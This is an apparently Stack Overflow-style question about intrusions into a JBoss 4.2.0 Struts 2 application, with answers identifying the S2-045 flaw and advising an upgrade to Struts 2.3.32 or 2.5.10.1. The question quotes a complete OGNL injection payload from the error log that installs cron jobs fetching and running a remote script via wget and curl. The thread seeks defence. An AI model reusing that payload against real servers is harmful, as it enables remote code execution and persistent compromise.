# JBOSS Struts 2 application intrusions

Tags: java, security, jakarta-ee, jboss, struts2

We have have a J2EE Struts 2 application.

Recently we saw some intrusions are coming to our application which runs on port 80. The Jboss (version 4.2.0) error log gives this:

> the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "15 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n50 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

They are injecting some .exe files into the Jboss bin folder and tries to interrupt the application as well as server. Already installed some anti virus software there. But that doesn't stop. Thinking about how to stop them from the application.

Any good idea will be helpful.

Comment: Besides upgrading, check this repo -> https://github.com/apache/struts-extras. Also note that even with latest upgrade you can still see the errors in the logs, **but the underlying issue is fixed.**

Comment: Is it safe to upgrade to 2.3.32 version ? Because no code changes is required for that. I was thinking if there is any way to <b>disable</b> the whole multi part file upload ?

Answer (score 1):

You've been attacked through the [S2-045](https://struts.apache.org/docs/s2-045.html) critical security issue.

The simplest solution to your problem is to upgrade immediately to either **2.3.32** or **2.5.10.1** 
(the former will require almost zero refactoring, the latter would require a quick migration, described in the [Struts 2.3 to 2.5 Migration Guide](https://struts.apache.org/docs/struts-23-to-25-migration.html)).

Always stay up-to-date.

Comment: Is it safe to upgrade to 2.3.32 version ? Because no code changes is required for that. I was thinking if there is any way to disable the whole multi part file upload ?

Comment: It is safe, 2.3.32 is the latest 2.3 maintenance version, fixing every bug / issue.

Comment: I have updated my library to  2.3.32, but still getting the same error. Is it that application using struts2 are not safe ?

Comment: Today it is 2.3.34. If you patch that thing, your application is safe. If you've received that idiotic DZone newsletter referring to the _Equifax affair_, just don't mind it. If you've waited until today to patch your code, then the problem is not Struts2, it is you.

Comment: I already have updated it after your post earlier i.e April 27. But what is Equifax affair ? And what could be my problem ?

Comment: Equifax is a huge (16bn$ mkt value) company which has [failed to patch it on march, and only noticed it on July 29](https://arstechnica.com/information-technology/2017/10/a-series-of-delays-and-major-errors-led-to-massive-equifax-breach/), being massively hacked and resulting in a disaster. What do you think, is it Struts2 fault ? :) IF you've patched it, you should not be exposed anymore. If your tests say you're vulnerable, then your patch OR your tests are wrong. Keep going until you discovery the truths. I'm sorry but I can't go beyond this: security is important, be sure to take care.